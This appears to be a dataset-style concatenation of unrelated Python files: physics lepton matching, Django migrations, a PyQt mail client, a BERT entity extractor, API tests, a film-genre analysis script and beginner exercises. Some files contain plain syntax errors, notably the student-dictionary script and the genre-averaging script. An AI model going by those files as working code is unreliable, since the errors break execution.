lVec = TLorentzVector()
lVec.SetPtEtaPhiE(Chain._gen_lPt[l], Chain._gen_lEta[l], Chain._gen_lPhi[l], Chain._gen_lE[l])
dR = inputVec.DeltaR(lVec)
if dR < .4: hasOverlap = True
return hasOverlap
def findMatchLepton(Chain, index):
out_index = None
inputVec = TLorentzVector()
inputVec.SetPtEtaPhiE(Chain._lPt[index], Chain._lEta[index], Chain._lPhi[index], Chain._lE[index])
minDeltaR = 9999999.
for l in xrange(ord(Chain._gen_nL)):
if Chain._gen_lFlavor[l] == Chain._lFlavor[index]: continue
if not Chain._gen_lIsPrompt[l]: continue
lVec = TLorentzVector()
lVec.SetPtEtaPhiE(Chain._gen_lPt[l], Chain._gen_lEta[l], Chain._gen_lPhi[l], Chain._gen_lE[l])
dR = inputVec.DeltaR(lVec)
if dR < minDeltaR:
out_index = l
minDeltaR = dR
if minDeltaR < .3:
return out_index
else:
return -1
def ZMassReconstructed(Chain):
bestMassDiff = 9999999.
#Start looping over the first leptons
for l1 in xrange(ord(Chain._nL)-1):
if not Chain._lPOGTight[l1] or Chain._lFlavor[l1] == 2: continue
l1Vec = TLorentzVector()
l1Vec.SetPtEtaPhiE(Chain._lPt[l1], Chain._lEta[l1], Chain._lPhi[l1], Chain._lE[l1])
#Start looping over the second lepton
for l2 in xrange(l1+1, ord(Chain._nL)):
if(not Chain._lPOGTight[l2] or Chain._lFlavor[l2] == 2): continue
if(Chain._lFlavor[l1] != Chain._lFlavor[l2]): continue
l2Vec = TLorentzVector()
l2Vec.SetPtEtaPhiE(Chain._lPt[l2], Chain._lEta[l2], Chain._lPhi[l2], Chain._lE[l2])
mass = (l1Vec + l2Vec).M()
if(abs(mass - 91.1876)< bestMassDiff):
bestMassDiff = abs(mass - 91.1876)
#print l1, l2, mass, bestMassDiff
if bestMassDiff < 10.: return True
return False
|
# Generated by Django 3.0.4 on 2020-04-05 09:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shopWeb', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Products',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Name', models.TextField()),
('Product_Image', models.ImageField(upload_to='')),
('Category', models.CharField(max_length=150)),
('Description', models.TextField()),
('Price', models.CharField(max_length=150)),
],
),
migrations.DeleteModel(
name='AcademicCourseComplaint',
),
migrations.DeleteModel(
name='Complaint',
),
]
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution, third party addon
# Copyright (C) 2017- Vertel AB (<http://vertel.se>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, _
import logging
_logger = logging.getLogger(__name__)
class ir_rule(models.Model):
_inherit = 'ir.rule'
@api.model
def init_records(self):
product_comp_rule = self.env.ref('product.product_comp_rule')
product_comp_rule.write({'domain_force': "['|',('company_ids','=',user.company_id.id),('company_ids','=',False)]"})
class product_template(models.Model):
_inherit = 'product.template'
company_ids = fields.Many2many(comodel_name='res.company', string='Companies')
|
# this project is licensed under the WTFPLv2, see COPYING.wtfpl for details
from PyQt5.QtWidgets import (
QTabWidget, QAction,
)
from PyQt5.QtCore import pyqtSlot as Slot, pyqtSignal as Signal
from PyQt5.QtGui import QKeySequence
from .threads_widget import ThreadsWidget
from .thread_widget import ThreadWidget
from .compose import ComposeWidget
class TabWidget(QTabWidget):
def __init__(self, *args, **kwargs):
super(TabWidget, self).__init__(*args, **kwargs)
self.tabCloseRequested.connect(self._closeTabRequested)
action = QAction(self)
action.setShortcuts(QKeySequence.Close)
action.triggered.connect(self.closeCurrentTab)
self.addAction(action)
action = QAction(self)
action.setShortcuts(QKeySequence('Ctrl+Page Up'))
action.triggered.connect(self.moveToPreviousTab)
self.addAction(action)
action = QAction(self)
action.setShortcuts(QKeySequence('Ctrl+Page Down'))
action.triggered.connect(self.moveToNextTab)
self.addAction(action)
self.addThreads()
def addThreads(self):
w = ThreadsWidget(parent=self)
w.threadActivated.connect(self.addThread)
w.tagActivated.connect(self._addThreadsTag)
self._addTab(w, focus=True)
return w
@Slot(str)
def _addThreadsTag(self, tag):
w = self.addThreads()
w.setQueryAndSearch('tag:%s' % tag)
@Slot(str)
def addThread(self, tid):
w = ThreadWidget(tid, parent=self)
w.triggeredReply.connect(self.addReply)
w.triggeredResumeDraft.connect(self.addResumeDraft)
self._addTab(w, focus=True)
return w
@Slot(str, bool)
def addReply(self, mid, to_all):
w = ComposeWidget(parent=self)
w.sent.connect(self._closeCompose)
w.setReply(mid, to_all)
self._addTab(w, focus=True)
return w
@Slot(str)
def addResumeDraft(self, mid):
w = ComposeWidget(parent=self)
w.sent.connect(self._closeCompose)
w.setFromDraft(mid)
self._addTab(w, focus=True)
return w
@Slot()
def addCompose(self):
w = ComposeWidget(parent=self)
w.sent.connect(self._closeCompose)
self._addTab(w, focus=True)
return w
@Slot()
def _closeCompose(self):
w = self.sender()
idx = self.indexOf(w)
self.removeTab(idx)
w.deleteLater()
@Slot(str)
def addForward(self, mid):
pass
def _addTab(self, widget, focus=False):
idx = self.addTab(widget, widget.windowTitle())
widget.windowTitleChanged.connect(self._tabTitleChanged)
if focus:
self.setCurrentIndex(idx)
return idx
@Slot(int)
def _closeTabRequested(self, idx):
if self.count() > 1:
self.removeTab(idx)
@Slot()
def closeCurrentTab(self):
if self.count() > 1:
self.removeTab(self.currentIndex())
def removeTab(self, idx):
w = self.widget(idx)
super(TabWidget, self).removeTab(idx)
w.setParent(None)
@Slot()
def moveToNextTab(self):
idx = (self.currentIndex() + 1) % self.count()
self.setCurrentIndex(idx)
@Slot()
def moveToPreviousTab(self):
idx = (self.currentIndex() - 1) % self.count()
self.setCurrentIndex(idx)
@Slot(str)
def _tabTitleChanged(self, title):
widget = self.sender()
idx = self.indexOf(widget)
if idx < 0:
return
self.setTabText(idx, title)
self.someTabTitleChanged.emit()
someTabTitleChanged = Signal()
|
from threading import Thread
import threading
import time
def qsort(sets, left, right):
print("thead {0} is sorting {1}".format(threading.current_thread(), sets[left:right]))
i = left
j = right
pivot = int(sets[int((left + right) / 2)])
temp = 0
while i <= j:
while pivot > sets[i]:
i = i + 1
while pivot < sets[j]:
j = j - 1
if i <= j:
temp = sets[i]
sets[i] = sets[j]
sets[j] = temp
i = i + 1
j = j - 1
lthread = None
rthread = None
if (left < j):
lthread = Thread(target=lambda: qsort(sets, left, j))
lthread.start()
if (i < right):
rthread = Thread(target=lambda: qsort(sets, i, right))
rthread.start()
if lthread is not None: lthread.join()
if rthread is not None: rthread.join()
return sets
'''testing below'''
ls = [1, 3, 6, 9, 1, 2, 3, 8, 6, 11, 15, 25, 3, 64, 17]
res = qsort(ls, 0, len(ls) - 1)
print(res)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOpenLotteryRegionCreateResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenLotteryRegionCreateResponse, self).__init__()
self._region_id = None
@property
def region_id(self):
return self._region_id
@region_id.setter
def region_id(self, value):
self._region_id = value
def parse_response_content(self, response_content):
response = super(AlipayOpenLotteryRegionCreateResponse, self).parse_response_content(response_content)
if 'region_id' in response:
self.region_id = response['region_id']
|
import pytest
import requests
class TestEventsUserScope(object):
env_id = "5"
event_id = "BeforeInstanceLaunch"
scope = "scalr"
def test_events_create(self,api):
create_resp = api.create("/api/v1beta0/user/envId/events/",
params=dict(envId=self.env_id),
body=dict(
description = "test event",
id = "create event"
))
return create_resp.box().data
def test_events_list(self, api):
create_resp = api.create("/api/v1beta0/user/envId/events/",
params=dict(envId=self.env_id),
body=dict(
description = "test event",
id = "list event"))
resp_event_id = create_resp.json()['data']['id']
resp = api.list(
"/api/v1beta0/user/envId/events/",
params=dict(
envId=self.env_id))
assert resp.json()['data'][0]['id'] == resp_event_id
def test_events_list_filters(self, api):
resp = api.list(
"/api/v1beta0/user/envId/events/",
params=dict(envId=self.env_id),
filters=dict(scope=self.scope))
assert resp.json()['data'][0]['id'] == self.event_id
def test_event_list_invalid_envId(self, api):
invalid_envId = 4
exc_message = "Invalid environment."
with pytest.raises(requests.exceptions.HTTPError) as err:
resp = api.list(
"/api/v1beta0/user/envId/events/",
params=dict(
envId=invalid_envId))
assert err.value.response.status_code == 404
assert exc_message in err.value.response.text
def test_role_categories_list_noassecc_envId(self, api):
noaccess_envId = 13
exc_message = "You don't have access to the environment."
with pytest.raises(requests.exceptions.HTTPError) as err:
resp = api.list(
"/api/v1beta0/user/envId/events/",
params=dict(
envId=noaccess_envId))
assert err.value.response.status_code == 403
assert exc_message in err.value.response.text
|
from transformers import BertTokenizer
from transformers import BertForTokenClassification
from transformers import BertConfig
from transformers import AdamW, WarmupLinearSchedule
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
import json
import os
from tqdm import tqdm
import argparse
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score, precision_score, recall_score
import numpy as np
import codecs
from utils import produce_length, make_label
# 定义可见的cuda设备
os.environ["CUDA_VISIBLE_DEVICES"] = '2'
def translate(word,label):
"""
根据开始位置和结束位置打标签
BIOES
"""
status = 0 # 0 表示未发现实体,1 表示正在处理实体
begin = 0
end = 0
len_entity = 0
record = []
for i in range(len(word)):
if(label[i]=='O'):
status = 0
len_entity = 0
continue
elif(label[i][0]=='B'):
status = 1
begin = i
len_entity+=1
elif(label[i][0]=='I'):
len_entity+=1
elif(label[i][0]=='E'):
tmp = {}
tmp['word'] = ''.join(word[begin:begin+len_entity+1])
tmp['type'] = label[i][2:]
record.append(tmp)
return record
def get_input(debug=True):
"""
得到Bert模型的输入
"""
input_word_list = []
input_label_list = []
with open("tmp/input.json", 'r', encoding='UTF-8') as f:
data = json.load(f)
bert_words = list(data["sentence"])
label_list = ["O" for _ in bert_words] # 首先制作全O的标签
for entity in data["entity-mentions"]:
en_start = entity["start"]
en_end = entity["end"]
en_type = entity["entity-type"]
# 根据开始与结束位置打标签
make_label(en_start, en_end, en_type, label_list)
input_word_list.append(["[CLS]"]+bert_words+["[SEP]"])
input_label_list.append(["O"]+label_list+["O"])
return input_word_list, input_label_list
def show_args(args):
"""
打印参数
"""
print(args)
def eval_predict(pred_list, label_list):
"""
评估预测的结果
"""
#print(label_list)
#print(pred_list)
#input()
f1 = f1_score(label_list, pred_list, average="micro")
p = precision_score(label_list, pred_list, average="micro")
r = recall_score(label_list, pred_list, average="micro")
return f1, p, r
class labelproducer:
def __init__(self, all_labels):
# all_labels是list中嵌套list
self.target_to_ids = self.get_target_to_ids(all_labels)
self.ids_to_target = {0:'O', 1: 'B-company', 2: 'I-company', 3: 'E-company', 4: 'B-department', 5: 'I-department', 6: 'E-department', 7: 'B-people', 8: 'E-people', 9: 'I-people', 10: 'B-product', 11: 'I-product', 12: 'E-product'}
def get_target_to_ids(self, all_labels):
"""
返回target_to_ids
"""
target_to_ids = dict()
for labels in all_labels:
for label in labels:
if label not in target_to_ids:
target_to_ids[label] = len(target_to_ids)
return target_to_ids
def convert_label_to_ids(self, labels):
"""
将label转换成ids
输入时label的列表
"""
ret_ids = []
for label in labels:
ret_ids.append(self.target_to_ids[label])
return ret_ids
def convert_ids_to_label(self, all_ids):
"""
将ids转换成label
输入是ids的列表
"""
ret_label = []
for ids in all_ids:
ret_label.append(self.ids_to_target[ids])
return ret_label
if __name__=="__main__":
# 数据读入部分
sentence = input("请输入你想预测的句子:")
dict_bert = {}
dict_bert['entity-mentions'] = []
dict_bert['sentence'] = sentence
final_json = json.dumps(dict_bert, indent=4, ensure_ascii=False)
with codecs.open("tmp/input.json", 'w', 'utf-8') as file:
file.write(final_json)
# 模型部分
parser = argparse.ArgumentParser()
parser.add_argument("--val_split", default=0.5, type=float)
parser.add_argument("--BERT_HOME", default="/data1/shgpu/sh/new/project/gingko/code/Bert_EntityExtraction/model/chinese_L-12_H-768_A-12/", type=str)
parser.add_argument("--no_cuda", action="store_true", default=False)
parser.add_argument("--seed", default=2019, type=int, help="随机模型初始化的随机种子")
parser.add_argument("--test_batch_size", default=1, type=int)
parser.add_argument("--max_len", default=256, type=int)
parser.add_argument("--adam_epsilon", default=1e-5, type=float)
parser.add_argument("--warmup_steps", default=0, type=int)
parser.add_argument("--max_grad_norm", default=1.0, type=float)
parser.add_argument("--model_name", default="bert-base-chinese", type=str)
args = parser.parse_args()
BERT_HOME = args.BERT_HOME
tokenizer = BertTokenizer.from_pretrained(os.path.join(BERT_HOME, "vocab.txt"), do_lower_case=True)
if not args.no_cuda and torch.cuda.is_available():
device = torch.device("cuda")
n_gpu = torch.cuda.device_count()
else:
device = torch.device("cpu")
# 设置可能用到的随机变量的种子
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu>0:
torch.cuda.manual_seed_all(args.seed)
# 得到整个训练集
input_word_list, input_label_list = get_input()
input_word_list_original = input_word_list[0].copy()
# 处理长度
input_word_list, attention_mask = produce_length(input_word_list, args.max_len, "[PAD]", ret_attention_mask=True)
input_label_list = produce_length(input_label_list, args.max_len, "O", ret_attention_mask=False)
# 将词变成对应的编码
input_word_ids = [tokenizer.convert_tokens_to_ids(word_list) for word_list in input_word_list]
# 将label变成对应的编码
lp = labelproducer(input_label_list)
input_label_list = [lp.convert_label_to_ids(labels) for labels in input_label_list]
# 将训练数据以及测试数据转换成tensor
test_input_ids = torch.tensor(input_word_ids, dtype=torch.long)
test_label = torch.tensor(input_label_list, dtype=torch.long)
test_attention_mask = torch.tensor(attention_mask, dtype=torch.long)
# 定义数据生成器(分批训练数据)
test_data = TensorDataset(test_input_ids, test_attention_mask, test_label)
test_sampler = SequentialSampler(test_data)
test_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=args.test_batch_size)
# 定义模型
print("load config from: {}".format(os.path.join(BERT_HOME, "bert_config.json")))
config = BertConfig.from_pretrained(os.path.join(BERT_HOME, "bert_config.json"), num_labels=13)
model = BertForTokenClassification.from_pretrained(BERT_HOME, config=config)
model.to(device)
model.load_state_dict(torch.load("./model/pretrain_bert.pth"))
model.eval()
with torch.no_grad():
pred_list = []
label_list = []
for step, batch in enumerate(test_dataloader):
if n_gpu == 1:
batch = tuple(t.to(device) for t in batch)
test_input_ids, test_attention_mask, label_ids = batch
outputs = model(test_input_ids, attention_mask=test_attention_mask)
logits = outputs[0]
pred_ids = torch.argmax(logits, dim=-1).detach().cpu().numpy().tolist()
label_ids = label_ids.detach().cpu().numpy().tolist()
# 根据attention_mask添加结果
for index_pred, pred in enumerate(pred_ids):
pred_list_sentence = []
label_list_sentence = []
for index_p, p in enumerate(pred):
if test_attention_mask[index_pred][index_p] == 1:
pred_list_sentence.append(p)
label_list_sentence.append(label_ids[index_pred][index_p])
pred_list.append(pred_list_sentence)
label_list.append(label_list_sentence)
# 拼接结果并预测
input_word_label=lp.convert_ids_to_label(pred_list[0])
# test_f1, test_p, test_r = caculate_report(label_list, pred_list, lp.convert_ids_to_label)
result=translate(input_word_list_original,input_word_label)
for i in range(len(result)):
print("识别到实体 "+result[i]['word']+" 类型为"+result[i]['type'])
i = 0
entity_pair=[]
while(i<len(result)):
# 提取出所有企业对
if(result[i]['type']=='company'):
ii=i+1
while(ii<len(result)):
if(result[ii]['type']=='company'):
entity_pair.append([result[i]['word'],result[ii]['word']])
ii+=1
# 提取出所有企业-产品对
if(result[i]['type']=='product'):
ii = i+1
while (ii < len(result)):
if (result[ii]['type'] == 'company'):
entity_pair.append([result[ii]['word'], result[i]['word']])
ii += 1
# 提取出所有企业-有关部门对
if (result[i]['type'] == 'department'):
ii = i+1
while (ii < len(result)):
if (result[ii]['type'] == 'company'):
entity_pair.append([result[ii]['word'], result[i]['word']])
ii += 1
# 提取出所有企业-人物对
if (result[i]['type'] == 'people'):
ii = i+1
while (ii < len(result)):
if (result[ii]['type']== 'company'):
entity_pair.append([result[ii]['word'], result[i]['word']])
ii += 1
i+=1
for i in range(len(entity_pair)):
file = open("/data1/shgpu/sh/new/project/gingko/code/ChineseNRE/data/origin_data/test_"+str(i)+".txt", 'w')
file.write(entity_pair[i][0]+"\t"+entity_pair[i][1]+"\t"+"管理"+"\t"+sentence)
file.flush()
print(entity_pair) |
"""Unit test suite for the Bytes Streams examples in the AWS-hosted documentation.
.. note::
These tests rely on discoverable AWS credentials existing.
"""
import os
import tempfile
import pytest
from .test_i_aws_encrytion_sdk_client import skip_tests, SKIP_MESSAGE
from .docs_examples_bytes import cycle_file
@pytest.mark.skipif(skip_tests(), reason=SKIP_MESSAGE)
def test_cycle_file():
_handle, filename = tempfile.mkstemp()
with open(filename, 'wb') as f:
f.write(os.urandom(1024))
try:
new_files = cycle_file(source_plaintext_filename=filename)
for f in new_files:
os.remove(f)
finally:
os.remove(filename)
|
# Francis Amani
# Pythion 2.0
""" Dictionaries """
# First Trial
print ''
student_details = { 'id':"16671/1313", 'name': "John Doe"
}
print student_details ['id']
# Second trial
print ''
student_details ['course'] = 'computer science'
print student_details
# Third trial
name = (raw.input('Kindly provide us with your name?\n'))
school_id = (raw_input('Provide us with your school ID?\n'))
entry_year = (raw.input('What year did you join?\n'))
gender = (raw.input('Are you male or female?\n'))
course = (raw.input('What course are you pursuing?\n'))
age = (raw.input('How old are you?\n'))
student details = {'name':name, 'school_id':school_id, 'entry_year':entry_year, 'gender'}
str(student_details)
print(student_details)
print(len(student_details))
print(student_details.keys())
print(student_details.values())
# For loops
for age in range(1,20):
print age
# Looping a score list
list = [1,5,15]
for x in list:
print list
|
# Generated by Django 3.1.7 on 2021-03-29 12:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogger', '0009_auto_20210326_1344'),
]
operations = [
migrations.AddField(
model_name='blog',
name='bio',
field=models.TextField(default="I'm Empty", max_length=1500),
),
migrations.AddField(
model_name='blog',
name='permission',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='blog',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='update timestamp'),
),
migrations.AlterField(
model_name='blog',
name='title',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='comment',
name='comment_post',
field=models.CharField(max_length=300),
),
migrations.AlterField(
model_name='post',
name='subject',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='post',
name='text',
field=models.TextField(max_length=1500),
),
]
|
"""
SCRIPT 1:
This script calculates the average topic distributions and average syntactic measures.
1. Function "get_genre_averages" is used for genre averages
2. Function "get_decade_averages" is used for decade averages
3. Results are saved as .csv and .png files
"""
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
#Set sample variable according to the FEATURE_MATRIX variable
sample = "sample_1930-2010"
MATRIX_DIR = "XXX\\filmgenre_classification\\9_featureMatrix"
RESULT_DIR = "XXX\\filmgenre_classification\\12-2_featureAverages"
FEATURE_MATRIX = MATRIX_DIR + "\\" + sample + "_feature_matrix.csv")
matrix_df = pd.read_csv(FEATURE_MATRIX)
#pd.set_option('max_columns', 20)
plt.style.use('seaborn-whitegrid')
warnings.simplefilter(action='ignore', category=FutureWarning)
def get_genre_averages(matrix_df):
#genre_list = ["Action", "Adventure", "Animation", "Comedy", "Crime", "Drama", "Family", "Fantasy", "History", "Horror", "Musical", "Mystery", "Romance", "Sci-Fi", "Thriller", "War", "Western"]
genre_list = ["Action", "Adventure", "Animation", "Crime", "Family", "Fantasy", "History", "Horror", "Musical", "Mystery", "Romance", "Sci-Fi", "Thriller", "War", "Western"]
syns = ["ADJCL", "CNPC", "CNPS", "DPPC", "MLC", "MLNP", "MLS", "NPPS","PASSPS","SCR"]
genre_average_topics = {}
genre_average_doclength = {}
genre_top_10_topics = {}
genre_average_syn = {}
for genre in genre_list:
genre_df = matrix_df[matrix_df["genres"].str.contains(genre)]
#Get topic columns and their means
topic_columns = genre_df.iloc[:, 6:-10]
averaged_topics = topic_columns.mean()
genre_average_topics[genre] = averaged_topics.to_dict()
#Get syntactic columns and their means
syn_columns = genre_df.iloc[:, -10:]
averaged_syn = syn_columns.mean()
genre_average_syn[genre] = averaged_syn.to_dict()
#Get documentLength column and the mean for each genre
doclength_column = genre_df.iloc[:,5]
averaged_doclength = doclength_column.mean()
genre_average_doclength[genre] = averaged_doclength
######################
# Topic averages #
######################
topic_average_df = pd.DataFrame.from_dict(genre_average_topics)
#print(topic_average_df["War"].sort_values(ascending=False))
for genre in genre_list:
#Find rows with highest values for each genre
top_10_topics = topic_average_df.nlargest(10, genre)
#Find topic names in index of each row
top_10_topics_list = list(top_10_topics.index.values)
#Save top 10 topics per genre in a dict
genre_top_10_topics[genre] = top_10_topics_list
top10_df = pd.DataFrame.from_dict(genre_top_10_topics)
#Change index so the best topic for each genre gets assigned a 1 instead of a 0
top10_df.set_index(np.arange(1,11,1), inplace=True)
pd.DataFrame.to_csv(topic_average_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_topic_averages_per_genre.csv", sep="\t", index=None)
pd.DataFrame.to_csv(top10_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_top10_topics_per_genre.csv", sep="\t")
#########################
# Document length #
#########################
#Create doclength dataframe and save it to csv
doclength_average_df = pd.DataFrame.from_dict(genre_average_doclength, orient="index", columns=["avg_doclength"])
pd.DataFrame.to_csv(doclength_average_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_doclength_averages_per_genre.csv")
doclength_average_df.plot(kind="bar", legend=None, figsize=(7.5,5))
plt.xlabel("Genres", fontsize="large")
plt.xticks(rotation=45)
plt.ylabel("Average number of words per movie")
plt.yticks(np.arange(0,11000,1000))
plt.tight_layout()
plt.savefig(RESULT_DIR + "\\genre\\" + sample + "\\" + sample "_genre_average_doclength.png")
plt.show()
#########################
# Syntactic features #
#########################
#Create syntactic average dataframe and save it to csv
syn_average_df = pd.DataFrame.from_dict(genre_average_syn)
pd.DataFrame.to_csv(syn_average_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_syntactic_averages_per_genre.csv")
#Create ranked dataframe for easier visualization
syn_ranked_df = syn_average_df.rank(method="max", ascending=True, axis=1)
#Insert syntactic feature labels into the dataframe again, because they can't be inferred from the index itself using the parallel_coordinates function!
syn_ranked_df["syns"] = syns
#Create parallel_coordinates figure
plt.figure(figsize=(7.5,5))
pd.plotting.parallel_coordinates(syn_ranked_df, "syns", colormap="Dark2")
plt.ylabel("Inverted rank", fontsize="large")
plt.yticks(np.arange(1,16,2))
plt.xlabel("Genres", fontsize="large")
plt.xticks(rotation=45)
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=True)
plt.tight_layout()
plt.savefig(RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_genre_syn_parallel_plot.png", bbox_inches="tight")
plt.show()
#Create pandas series with average ranks per genre
syn_avg_ranks = syn_ranked_df.mean()
#Create barplot with average ranks per genre
plt.figure(figsize=(7.5,5))
syn_avg_ranks.plot(kind="bar", legend=None)
plt.ylabel("Average inverted rank", fontsize="large")
plt.xlabel("Genres", fontsize="large")
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig(RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_genre_syn_average_ranks.png", bbox_inches="tight")
plt.show()
def get_decade_averages(matrix_df):
#Get the right list of decades depending on the used sample
if sample == "sample_1930-2010" or sample == "sample_genre-based":
decade_list = ["1930", "1940", "1950", "1960", "1970", "1980", "1990", "2000", "2010"]
elif sample == "sample_1970-2010":
decade_list = ["1970", "1980", "1990", "2000", "2010"]
elif sample == "sample_2000-2010":
decade_list = ["2000", "2010"]
syns = ["ADJCL", "CNPC", "CNPS", "DPPC", "MLC", "MLNP", "MLS", "NPPS","PASSPS","SCR"]
decade_average_topics = {}
decade_average_doclength = {}
decade_top_10_topics = {}
decade_average_syn = {}
for decade in decade_list:
#Cast on "int" is necessary because otherwise wrong types (int vs string) are compared
decade_df = matrix_df.loc[matrix_df["decade"] == int(decade)]
#Get topic columns and their means
topic_columns = decade_df.iloc[:, 6:-10]
averaged_topics = topic_columns.mean()
decade_average_topics[decade] = averaged_topics.to_dict()
#Get syntactic columns and their means
syn_columns = decade_df.iloc[:, -10:]
averaged_syn = syn_columns.mean()
decade_average_syn[decade] = averaged_syn.to_dict()
#Get documentLength column and the mean for each genre
doclength_column = decade_df.iloc[:,5]
averaged_doclength = doclength_column.mean()
decade_average_doclength[decade] = averaged_doclength
######################
# Topic averages #
######################
topic_average_df = pd.DataFrame.from_dict(decade_average_topics)
for decade in decade_list:
#Find rows with highest values for each genre
top_10_topics = topic_average_df.nlargest(10, decade)
#Find topic names in index of each row
top_10_topics_list = list(top_10_topics.index.values)
#Save top 10 topics per genre in a dict
decade_top_10_topics[decade] = top_10_topics_list
top10_df = pd.DataFrame.from_dict(decade_top_10_topics)
#Change index so the best topic for each genre gets assigned a 1 instead of a 0
top10_df.set_index(np.arange(1,11,1), inplace=True)
pd.DataFrame.to_csv(topic_average_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_topic_averages_per_decade.csv", sep="\t", index=None)
pd.DataFrame.to_csv(top10_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_top10_topics_per_decade.csv", sep="\t")
#########################
# Document length #
#########################
#Create doclength dataframe and save it to csv
doclength_average_df = pd.DataFrame.from_dict(decade_average_doclength, orient="index", columns=["avg_doclength"])
pd.DataFrame.to_csv(doclength_average_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_doclength_averages_per_decade.csv")
doclength_average_df.plot(kind="bar", legend=None, figsize=(7.5,5))
plt.xlabel("Decades", fontsize="large")
plt.xticks(rotation=45)
plt.ylabel("Average number of words per movie")
plt.yticks(np.arange(0,11000,1000))
plt.tight_layout()
plt.savefig(RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_decade_average_doclength.png")
plt.show()
#########################
# Syntactic features #
#########################
#Create syntactic average dataframe and save it to csv
syn_average_df = pd.DataFrame.from_dict(decade_average_syn)
pd.DataFrame.to_csv(syn_average_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_syntactic_averages_per_decade.csv")
#Create ranked dataframe for easier visualization
syn_ranked_df = syn_average_df.rank(method="max", ascending=True, axis=1)
#Insert syntactic feature labels into the dataframe again, because they can't be inferred from the index itself using the parallel_coordinates function!
syn_ranked_df["syns"] = syns
#Create parallel_coordinates figure
plt.figure(figsize=(7.5,5))
pd.plotting.parallel_coordinates(syn_ranked_df, "syns", colormap="Dark2")
plt.ylabel("Inverted rank", fontsize="large")
plt.yticks(np.arange(1,len(decade_list),1))
plt.xlabel("Decades", fontsize="large")
plt.xticks(rotation=45)
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=True)
plt.tight_layout()
plt.savefig(RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_decade_syn_parallel_plot.png", bbox_inches="tight")
plt.show()
#Create pandas series with average ranks per genre
syn_avg_ranks = syn_ranked_df.mean()
#Create barplot with average ranks per genre
plt.figure(figsize=(7.5,5))
syn_avg_ranks.plot(kind="bar", legend=None)
plt.ylabel("Average inverted rank", fontsize="large")
plt.xlabel("Decades", fontsize="large")
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig(RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_decade_syn_average_ranks.png", bbox_inches="tight")
plt.show()
def main(matrix_df):
get_genre_averages(matrix_df)
get_decade_averages(matrix_df)
main(matrix_df) |
import matplotlib.pyplot as plt
import numpy as np
x=np.linspace(-np.pi,np.pi,500,endpoint=True)
y=np.sin(x)
plt.plot(x,y)
ax=plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_position(('data',0))
ax.spines['left'].set_position(('data',0))
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
plt.show()
|
'''
dia = 3
mes = "Março"
ano = 2021
print("Eu faço aniversário em {} de {} de {}.".format(dia,mes,ano))
'''
# nome = "clarice"
# nome = nome.capitalize()
# print(nome) #resultado = Clarice
''' palavra = "alura"
palavra.upper()
print(palavra) #qual é o resultado? = alura '''
'''# coding: utf-8
frutas = ['Banana', 'Maca', 'Pera', 'Uva', 'Melancia', 'Jamelão']
fruta_pedida = input('Qual é a fruta que deseja consultar ?')
fruta_pedida = fruta_pedida.strip()
if(fruta_pedida in frutas):
print ('Sim, temos a fruta.')
else:
print ('Não temos a fruta.')
'''
'''precos = [1525,1120,1464,1200,1330,1356,1312,1531,1232, 1234,1250,1114,1553,1147,1303,1296,1309,1404,1479,1376,1152,1440,1038,1018,1291,1388,1577,1115,1488,1494,1254,1230,1122,1396,1208,1356,1549,1116,1443,1075,1536,1542,1036,1015,1020,1217,1484,1032,1390,1026 ]
print( min(precos)) # min() imprime o menor número da LISTA e max() o maior número da LISTA'''
'''funcionarios = ['Astrid','Flavia','Talia', ... ,'Mauricio', 'Waldemar', 'Marina']
print(funcionarios)
print(len(funcionarios)) # len() retorna o tamanho da lista'''
'''frutas = ['Banana', 'Morango', 'Maçã', 'Uva', 'Maçã', 'Uva']
print(frutas.index('Uva')) # RESULTADO = 3, volta o valor do índice do elemento na lista'''
'''frutas = ['Banana', 'Morango', 'Maçã', 'Uva']
fruta_buscada = 'Melancia'
if fruta_buscada in frutas:
print(frutas.index(fruta_buscada))
else:
print('Desculpe, a {} não está na lista frutas'.format( fruta_buscada))
